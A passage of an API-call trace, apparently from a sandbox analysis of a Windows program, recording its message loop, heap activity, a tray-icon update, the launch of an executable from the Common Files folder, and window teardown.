wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0256.013] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0256.013] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0256.013] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.013] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.013] BeginPaint (in: hWnd=0x50150, lpPaint=0x87f788 | out: lpPaint=0x87f788) returned 0x23010712 [0256.013] EndPaint (hWnd=0x50150, lpPaint=0x87f788) returned 1 [0256.013] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0256.013] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0256.013] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0256.014] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.014] NtdllDialogWndProc_W () returned 0x1 [0256.014] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.014] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.014] GetSysColor (nIndex=15) returned 0xf0f0f0 [0256.014] SetBkColor (hdc=0x4c0107cd, color=0xf0f0f0) returned 0xf0f0f0 [0256.014] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.014] NtdllDialogWndProc_W () returned 0x0 [0256.014] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.014] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.014] GetSysColor (nIndex=15) returned 0xf0f0f0 [0256.014] SetBkColor (hdc=0x4c0107cd, color=0xf0f0f0) returned 0xf0f0f0 [0256.015] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.015] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.015] GetWindowLongW (hWnd=0x50148, nIndex=-21) returned 3 [0256.015] NtdllDialogWndProc_W () returned 0x0 [0256.015] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.015] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.015] GetWindowLongW (hWnd=0x50148, nIndex=-21) returned 3 [0256.015] NtdllDialogWndProc_W () returned 0x0 [0256.015] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0256.015] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0256.015] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0256.016] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.016] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.016] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0256.016] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0256.016] GetSysColor (nIndex=15) returned 0xf0f0f0 [0256.016] SetTextColor (hdc=0xd010720, color=0xff00) returned 0x0 [0256.016] SetBkColor (hdc=0xd010720, color=0x0) returned 0xffffff [0256.016] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.016] NtdllDialogWndProc_W () returned 0x1 [0256.016] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.016] NtdllDialogWndProc_W () returned 0x0 [0256.016] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.016] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.016] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0256.017] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0256.017] GetSysColor (nIndex=15) returned 0xf0f0f0 [0256.017] SetTextColor (hdc=0xd010720, color=0xff00) returned 0xff00 [0256.017] SetBkColor (hdc=0xd010720, color=0x0) returned 0x0 [0256.017] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.017] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.017] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0256.017] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0256.017] GetSysColor (nIndex=15) returned 0xf0f0f0 [0256.017] SetTextColor (hdc=0xd010720, color=0xff00) returned 0x0 [0256.017] SetBkColor (hdc=0xd010720, color=0x0) returned 0xffffff [0256.017] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.018] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.018] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0256.018] GetWindowLongW (hWnd=0x30166, nIndex=-21) returned 4 [0256.018] GetSysColor (nIndex=15) returned 0xf0f0f0 [0256.018] SetTextColor (hdc=0xd010720, color=0xff00) returned 0xff00 [0256.018] SetBkColor (hdc=0xd010720, color=0x0) returned 0x0 [0256.018] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0256.018] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0256.018] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0256.018] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0256.018] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0256.018] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 1 [0256.019] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0256.019] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0256.019] IsDialogMessageW (hDlg=0x50150, lpMsg=0x87fa94) returned 0 [0256.019] TranslateMessage (lpMsg=0x87fa94) returned 0 [0256.019] DispatchMessageW (lpMsg=0x87fa94) returned 0x0 [0256.019] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xefe3d0 [0256.019] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c80 [0256.019] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87f130) returned 1 [0256.020] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xefe3d0 | out: hHeap=0xc60000) returned 1 [0256.020] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c80 | out: hHeap=0xc60000) returned 1 [0256.020] KillTimer (hWnd=0x30172, uIDEvent=0x1) returned 1 [0256.021] SetTimer (hWnd=0x30172, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0256.021] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 1 [0256.021] TranslateAcceleratorW (hWnd=0x50150, hAccTable=0x60175, lpMsg=0x87fa94) returned 0 [0256.021] TranslateMessage (lpMsg=0x87fa94) returned 0 [0256.021] DispatchMessageW (lpMsg=0x87fa94) returned 0x0 [0256.021] GetForegroundWindow () returned 0x50150 [0256.021] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.021] GetCursorPos (in: lpPoint=0x87f8d0 | out: lpPoint=0x87f8d0*(x=781, y=507)) returned 1 [0256.021] ScreenToClient (in: hWnd=0x50150, lpPoint=0x87f8d0 | out: lpPoint=0x87f8d0) returned 1 [0256.021] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xe97950 [0256.021] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b228 [0256.021] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c80 [0256.021] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4c50 [0256.021] GetAsyncKeyState (vKey=1) returned 1 [0256.021] GetAsyncKeyState (vKey=2) returned 0 [0256.022] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0256.022] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c60 [0256.022] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec688 [0256.022] CharUpperBuffW (in: lpsz="RESTARTSCRIPT", cchLength=0xd | out: lpsz="RESTARTSCRIPT") returned 0xd [0256.022] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec688 | out: hHeap=0xc60000) returned 1 [0256.022] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c60 | out: hHeap=0xc60000) returned 1 [0256.022] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe7b300 [0256.022] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe81c88 [0256.022] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0256.022] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4c60 [0256.022] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xefe3d0 [0256.022] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c70 [0256.022] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xefe3d0 | out: hHeap=0xc60000) returned 1 [0256.022] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c70 | out: hHeap=0xc60000) returned 1 [0256.022] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4c70 [0256.022] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xec2028 [0256.022] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xec2028 | out: hHeap=0xc60000) returned 1 [0256.022] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c70 | out: hHeap=0xc60000) returned 1 [0256.022] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c60 | out: hHeap=0xc60000) returned 1 [0256.023] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xed5878 [0256.023] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0256.023] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec688 [0256.023] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78ca8 [0256.023] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4c60 [0256.023] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78dc8 [0256.023] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c60 | out: hHeap=0xc60000) returned 1 [0256.023] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x42) returned 0xe86fe8 [0256.023] GetCurrentDirectoryW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x14 [0256.023] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x2a) returned 0xed2d48 [0256.023] GetCurrentDirectoryW (in: nBufferLength=0x14, lpBuffer=0xed2d48 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0256.023] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x87f6e0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x87f6a8 | out: lpCommandLine="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessInformation=0x87f6a8*(hProcess=0x61c, hThread=0x5e8, dwProcessId=0x350, dwThreadId=0x330)) returned 1 [0256.029] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe86fe8 | out: hHeap=0xc60000) returned 1 [0256.029] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed2d48 | out: hHeap=0xc60000) returned 1 [0256.029] CloseHandle (hObject=0x5e8) returned 1 [0256.029] CloseHandle (hObject=0x61c) returned 1 [0256.029] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78dc8 | out: hHeap=0xc60000) returned 1 [0256.029] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78ca8 | out: hHeap=0xc60000) returned 1 [0256.029] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec688 | out: hHeap=0xc60000) returned 1 [0256.029] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0256.029] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed5878 | out: hHeap=0xc60000) returned 1 [0256.029] PeekMessageW (in: lpMsg=0x87f83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f83c) returned 0 [0256.029] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81c88 | out: hHeap=0xc60000) returned 1 [0256.029] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b300 | out: hHeap=0xc60000) returned 1 [0256.029] PeekMessageW (in: lpMsg=0x87fa94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa94) returned 0 [0256.030] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec688 [0256.030] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c60 [0256.030] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec868 [0256.030] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b300 [0256.030] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c70 [0256.030] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b300 | out: hHeap=0xc60000) returned 1 [0256.030] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec4f8 [0256.030] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe7b300 [0256.030] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec688 | out: hHeap=0xc60000) returned 1 [0256.030] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c60 | out: hHeap=0xc60000) returned 1 [0256.030] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec688 [0256.030] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c60 [0256.030] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeecae8 [0256.031] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78ca8 [0256.031] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4c90 [0256.031] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78ca8 | out: hHeap=0xc60000) returned 1 [0256.031] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec9f8 [0256.031] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe78ca8 [0256.031] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec688 | out: hHeap=0xc60000) returned 1 [0256.031] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4c60 | out: hHeap=0xc60000) returned 1 [0256.031] LockWindowUpdate (hWndLock=0x0) returned 0 [0256.031] DestroyWindow (hWnd=0x30172) returned 1 [0256.031] NtdllDefWindowProc_W () returned 0x0 [0256.032] KillTimer (hWnd=0x30172, uIDEvent=0x1) returned 1 [0256.032] Shell_NotifyIconW (dwMessage=0x2, lpData=0x87f4b0) returned 1 [0256.058] DestroyWindow (hWnd=0x50150) returned 1 [0256.058] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.058] NtdllDialogWndProc_W () returned 0x0 [0256.058] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.058] NtdllDialogWndProc_W () returned 0x0 [0256.069] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.069] NtdllDialogWndProc_W () returned 0x0 [0256.082] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.082] NtdllDialogWndProc_W () returned 0x1 [0256.083] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.083] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.083] NtdllDialogWndProc_W () returned 0x0 [0256.083] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.083] NtdllDialogWndProc_W () returned 0x0 [0256.083] NtdllDefWindowProc_W () returned 0x0 [0256.084] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.084] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.084] InvalidateRect (hWnd=0x50150, lpRect=0x0, bErase=1) returned 1 [0256.084] DestroyAcceleratorTable (hAccel=0x60175) returned 1 [0256.084] DeleteObject (ho=0x150a0713) returned 1 [0256.084] DestroyWindow (hWnd=0x50148) returned 1 [0256.084] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.084] NtdllDialogWndProc_W () returned 0x0 [0256.084] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe766e0 | out: hHeap=0xc60000) returned 1 [0256.085] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4130 | out: hHeap=0xc60000) returned 1 [0256.085] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe766c8 | out: hHeap=0xc60000) returned 1 [0256.085] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4120 | out: hHeap=0xc60000) returned 1 [0256.085] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe764a0 | out: hHeap=0xc60000) returned 1 [0256.085] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4000 | out: hHeap=0xc60000) returned 1 [0256.085] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca7388 | out: hHeap=0xc60000) returned 1 [0256.085] DestroyWindow (hWnd=0x30166) returned 1 [0256.085] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.085] NtdllDialogWndProc_W () returned 0x0 [0256.085] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76740 | out: hHeap=0xc60000) returned 1 [0256.085] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4190 | out: hHeap=0xc60000) returned 1 [0256.085] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76728 | out: hHeap=0xc60000) returned 1 [0256.085] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4180 | out: hHeap=0xc60000) returned 1 [0256.085] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76710 | out: hHeap=0xc60000) returned 1 [0256.085] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4170 | out: hHeap=0xc60000) returned 1 [0256.086] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd932c0 | out: hHeap=0xc60000) returned 1 [0256.086] DeleteObject (ho=0x430a070d) returned 1 [0256.086] DestroyWindow (hWnd=0x90164) returned 1 [0256.086] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.086] NtdllDialogWndProc_W () returned 0x0 [0256.086] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76788 | out: hHeap=0xc60000) returned 1 [0256.086] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e20 | out: hHeap=0xc60000) returned 1 [0256.086] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76938 | out: hHeap=0xc60000) returned 1 [0256.086] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e30 | out: hHeap=0xc60000) returned 1 [0256.086] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe768f0 | out: hHeap=0xc60000) returned 1 [0256.086] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4340 | out: hHeap=0xc60000) returned 1 [0256.086] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xedd350 | out: hHeap=0xc60000) returned 1 [0256.086] DeleteObject (ho=0x370a0272) returned 1 [0256.086] DestroyWindow (hWnd=0x400a2) returned 1 [0256.087] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.087] NtdllDialogWndProc_W () returned 0x0 [0256.087] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b2b8 | out: hHeap=0xc60000) returned 1 [0256.087] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41d0 | out: hHeap=0xc60000) returned 1 [0256.087] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78d98 | out: hHeap=0xc60000) returned 1 [0256.087] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41b0 | out: hHeap=0xc60000) returned 1 [0256.087] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b150 | out: hHeap=0xc60000) returned 1 [0256.087] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e80 | out: hHeap=0xc60000) returned 1 [0256.087] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd9f438 | out: hHeap=0xc60000) returned 1 [0256.087] DeleteObject (ho=0x150a070f) returned 1 [0256.087] DestroyWindow (hWnd=0x3010a) returned 1 [0256.087] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.087] NtdllDialogWndProc_W () returned 0x0 [0256.088] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b288 | out: hHeap=0xc60000) returned 1 [0256.088] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e90 | out: hHeap=0xc60000) returned 1 [0256.088] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b270 | out: hHeap=0xc60000) returned 1 [0256.088] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e40 | out: hHeap=0xc60000) returned 1 [0256.088] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe78af8 | out: hHeap=0xc60000) returned 1 [0256.088] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4e00 | out: hHeap=0xc60000) returned 1 [0256.088] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xf2af80 | out: hHeap=0xc60000) returned 1 [0256.088] DeleteObject (ho=0x1f0a06f8) returned 1 [0256.088] DestroyWindow (hWnd=0x3015e) returned 1 [0256.088] GetWindowLongW (hWnd=0x50150, nIndex=-21) returned 0 [0256.088] NtdllDialogWndProc_W () returned 0x0 [0256.089] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe7b2e8 | out: hHeap=0xc60000) returned 1 [0256.089] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4eb0 | out: hHeap=0xc60000) returned 1 [0256.089] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76830 | out: hHeap=0xc60000) returned 1 [0256.089] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4d20 | out: hHeap=0xc60000) returned 1 [0256.089] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe768a8 | out: hHeap=0xc60000) returned 1 [0256.089] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4de0 | out: hHeap=0xc60000) returned 1 [0256.089] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xf2b028 | out: hHeap=0xc60000) returned 1 [0256.091] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4ce0 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4220 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4260 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4df0 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed41a0 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4140 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe766b0 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4100 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76698 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed40f0 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76680 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed40e0 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76668 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed40d0 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76650 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed40c0 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76638 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed40b0 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76620 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed40a0 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76608 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4090 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe765f0 | out: hHeap=0xc60000) returned 1 [0256.092] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4080 | out: hHeap=0xc60000) returned 1 [0256.093] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe765d8 | out: hHeap=0xc60000) returned 1 [0256.093] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4070 | out: hHeap=0xc60000) returned 1 [0256.093] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe765c0 | out: hHeap=0xc60000) returned 1 [0256.093] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4060 | out: hHeap=0xc60000) returned 1 [0256.093] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe765a8 | out: hHeap=0xc60000) returned 1 [0256.093] HeapFree (in: 